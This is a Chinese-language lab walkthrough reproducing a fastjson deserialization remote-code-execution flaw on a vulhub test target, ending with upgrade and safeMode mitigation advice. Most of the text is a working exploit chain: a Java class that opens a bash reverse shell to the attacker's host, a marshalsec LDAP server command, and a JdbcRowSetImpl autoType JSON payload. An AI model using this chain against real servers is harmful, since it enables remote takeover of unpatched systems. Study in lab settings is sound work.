fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。
阿里巴巴公司开源Java开发组件Fastjson存在反序列化漏洞(CNVD-2022-40233)。攻击者可利用该漏洞实施任意文件写入、服务端请求伪造等攻击行为,造成服务器权限被窃取、敏感信息泄漏等严重影响。
fastjson<=1.2.24
该漏洞影响fastjson 1.2.80及之前所有版本
图示:
环境准备
被攻击主机:CentOS7(192.168.217.140)
JDK版本:1.8 (shell弹不进去请检查版本)
靶场环境:vulhub/fastjson-1.2.24-rce
攻击主机:kali(192.168.217.141)
使用工具:marshalsec-0.0.3-SNAPSHOT-all.jar ,
GitHub - RandomRobbieBF/marshalsec-jar: marshalsec-0.0.3-SNAPSHOT-all compiled on X64
docker-compose up -d
漏洞验证:
{
"a":{
"@type":"java.net.Inet4Address",
"val":"申请的域名"
}
}
漏洞利用:
import java.lang.Runtime;
import java.lang.Process;
public class GetShell {
static {
try {
Runtime rt = Runtime.getRuntime();
String[] commands = {"bash", "-c", "bash -i >& /dev/tcp/192.168.217.141/4444 0>&1"};
Process pc = rt.exec(commands);
pc.waitFor();
} catch (Exception e) {
// do nothing
}
}
}
javac GetShell.java
python -m SimpleHTTPServer
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://192.168.217.141:8000/#GetShell 6666 
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://192.168.217.141:6666/GetShell",
"autoCommit":true
}
}
- 建议升级到最新版本1.2.83
- safeMode加固。Fastjson在1.2.68及之后的版本中引入了safeMode,配置safeMode后,无论白名单和黑名单,都不支持 autoType,可杜绝反序列化Gadgets类变种攻击
- 升级至Fastjson v2